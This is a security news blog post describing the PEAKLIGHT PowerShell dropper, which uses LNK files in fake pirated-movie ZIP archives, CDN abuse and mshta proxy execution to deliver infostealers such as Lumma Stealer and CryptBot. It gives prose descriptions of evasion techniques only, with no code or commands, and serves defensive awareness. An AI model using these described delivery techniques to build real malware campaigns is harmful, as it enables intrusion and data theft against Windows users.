Cybersecurity researchers have recently discovered an unprecedented dropper. Being dubbed the PEAKLIGHT dropper, it’s used to launch malware capable of infecting Windows systems. Reports claim that such infections lead to the prevalence of information stealers and loaders on Windows devices. In this article, we’ll cover what the dropper is and how it functions.

Understanding The PEAKLIGHT Dropper

As per recent media reports, the PEAKLIGHT dropper is an obfuscated PowerShell-based downloader. The dropper itself is part of a multi-stage execution chain which focuses on checking the presence of ZIP archives.

During this process, the aim of a threat actor leveraging the PEAKLIGHT dropper for malicious purposes is to identify such archives in hard-coded file paths. However, if such an archive does not exist, the downloader initiates contact with a CDN server.

This contact is used to download a remotely hosted file and save it to the disk. As of now PEAKLIGHT has been observed downloading varying payload that include:

• LUMMAC.V2.
• SHADOWADDER.
• CRYPTBOT.

During such downloads different obfuscation and evasion methods were used. Two common examples of such methods include proxy execution and CDN abuse. It’s worth mentioning here that pirated movies have been targeted by malware earlier in June as well.

Attack Chain Of The  PEAKLIGHT Dropper

Those keen on ensuring that their security protocols are effective must know that the attack technique of the PEAKLIGHT dropper has been for distributing malware strains that include Lumma Stealer, Hijack Loader, and CryptBot. In addition, all these strains advertised under the malware-as-a-service (MaaS) model.

As far as the attack chain is concerned, the dropper initiates its malicious intent at a Windows shortcut (LNK) file. This file is downloaded using a drive-by technique seen in action when users search for movies online. These files are distributed in ZIP archives masked as a pirated movie.

After a successful download, the LNK files contact a content delivery network (CDN) from where the JavaScript dropper can be accessed. The dropper then executes the PEAKLIGHT downloader script on the host allowing it to reach out to a command-and-control (C2) server. This allows the script to fetch additional payloads.

Mandiant, a cybersecurity firm owned by Google, has discovered different variations of the LNK files. It’s worth mentioning that some of these files leverage asterisks to launch the legitimate mshta.exe. Doing so allows them to run malicious code retrieved from the remote server in a discreet manner.

Lastly, the disclosure of such tactics is closely tied to a malvertising campaign detailed by Malwarebytes. The campaign uses fraudulent Google Search ads for Slack and directs targets to bogus websites on which malicious installers that lead to the deployment of remote access trojans (RATs) are hosted.

Conclusion

The PEAKLIGHT dropper represents a sophisticated new threat targeting Windows users, employing obfuscation, CDN abuse, and malvertising campaigns. By exploiting ZIP archives and fake ads, it delivers malware like Lumma Stealer and CryptBot, highlighting the need for robust cybersecurity practices to mitigate such evolving attack vectors.

The sources for this piece include articles in The Hacker News and Cyware.

The post PEAKLIGHT Dropper: Hackers Target Windows With Downloads appeared first on TuxCare.

*** This is a Security Bloggers Network syndicated blog from TuxCare authored by Wajahat Raja. Read the original post at: https://tuxcare.com/blog/peaklight-dropper-hackers-target-windows-with-downloads/